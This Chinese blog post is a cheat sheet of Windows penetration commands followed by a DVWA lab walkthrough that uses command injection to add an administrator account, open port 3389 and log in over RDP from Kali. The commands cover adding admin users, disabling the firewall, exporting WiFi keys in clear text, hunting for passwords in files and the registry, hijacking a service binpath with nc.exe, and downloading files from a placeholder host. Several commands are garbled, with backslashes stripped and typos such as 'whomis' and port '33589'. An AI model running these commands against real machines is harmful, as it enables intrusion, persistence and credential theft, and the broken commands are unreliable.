windows渗透常用命令

net 的常用用法

查看共享连接

net use

增加远程共享

net use host /u:user pass

查看域中当前的主机列表

net view /domain

查看当前域中的用户

net user /domain

增加一个本地用户

net user user pass /add

将新增的用户加到本地管理员组

net localgroup "Administrators" user /add

查看域中的密码策略

net accounts /domain

查看本地组

net localgroup "Group"

查看域中的组信息

net group /domain

查看域中指定组的成员

net group "Domain group" /domain

查看当前机器所在的域名

net config workstation

查看当前服务器所在的域名

net config server

系统信息相关命令
显示系统信息

systeminfo

查看远程主机的系统信息

systeminfo /S ip /U domainuser /P Pwd

显示进程和服务信息

tasklist /svc

显示所有进程以及DLL信息

tasklist /m

显示进程和所有者

tasklist /v

查看远程主机的进程列表

tasklist /S ip /v

搜索所有 pdf 文件

dir /a /s /b c:'.pdf'

显示服务信息

sc query

显示具体的服务信息(包括二进制路径和运行使用)

sc qc Spooler

找出文件名字包含 password 的文件

findstr /si 'password' .txt

搜索敏感文件名称

dir /s *pass* == *cred* == *vnc* == *.config*

更改服务的二进制路径

sc config upnphost binpath= "C:nc.exe"

修改系统服务的权限

sc config upnphost obj= ".LocalSystem" password= ""

检查系统服务的权限

accesschk.exe -ucqv "Authenticated Users" * /accepteula

检查指定服务的权限

accesschk.exe -ucqv ServceName /accepteula

检查指定组在指定目录下的写权限

accesschk.exe -uwdqs "Authenticated Users" c: /accepteula

网络信息
打印路由表

route print

保存当前主机上的所有WiFi信息

netsh wlan export profile folder=. key=clear

设置当前配置禁用防火墙

netsh advfirewall set currentprofile state off

设置端口转发

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2

开启远程访问
启用远程访问

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

启用远程协助

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

修改远程访问端口

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f

注册表操作
查找注册表中的密码

reg query HKLM /f password /t REG_SZ /s

查询 winlogon 信息

reg query "HKLMSoftwareMicrosoftWindows NTCurrentVersionwinlogon"

使用 powershell
下载文件

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com/test.txt','C:UsersadminDesktoptest.test')"

列出运行的服务

Get-Service I where object {$ .status -eq ''Running''}

举一个例子,在DVWA的命令注入中给靶机增加一个用户并远程登录。
下面我通过命令注入的方式,在windows创建管理员用户,并开启3389远程进行登录。
1.通过Kail Linux给Windows7增加普通用户
输入命令:127.0.0.1 && net user liuweijiang 123456 /add ,创建用户名为我的拼音的用户,密码为123456,执行结果如图1所示,下面会显示执行成功
在这里插入图片描述
图1

我们可以输入127.0.0.1 && net user 查看一下是否创建成功,结果如图2所示,可以看到成功创建了一个用户名为liuweijiang的用户

在这里插入图片描述

2.将普通用户提权为系统管理员
输入命令127.0.0.1 && net localgroup Administrators /add liuweijiang

我们可以输入127.0.0.1 && net localgroup administrators ,查看是否提权成功,结果如图3所示,可以看到administrators下存在为我们设置的新用户liuweijiang,代表我们创立的用户为系统管理员用户。
请添加图片描述

3.给windows开启3389端口
首先我们可以通过命令查看3389端口是否开启:127.0.0.1 && netstat -an,如图4
请添加图片描述

通过查看我们的3389是没有打开的,我们使用命令进行打开.
输入命令:
127.0.0.1 && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 执行结果如图5所示.
请添加图片描述

我们可以再执行一次127.0.0.1 && netstat -an 查看3389端口是否成功打开,通过图6所示,3389端口成功打开。

请添加图片描述
图6
4.通过kail去远程windows的桌面
Kali上远程连接Windows系统的服务器我们需要安装两个工具,rdesktop和tsclient。
安装rdesktop,输入命令:apt-get install rdesktop

安装tsclient,输入命令:apt-get install tsclient

安装好后,我们进行登录输入命令:rdesktop 192.168.253.212:3389
成功连接后,我们选择其他用户,登录我们之前创建的新用户:liuweijiang

登录成功后,我们在命令行中输入whomis,如图7所示
请添加图片描述
请添加图片描述

作为实验后,记得关闭33589端口,输入命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值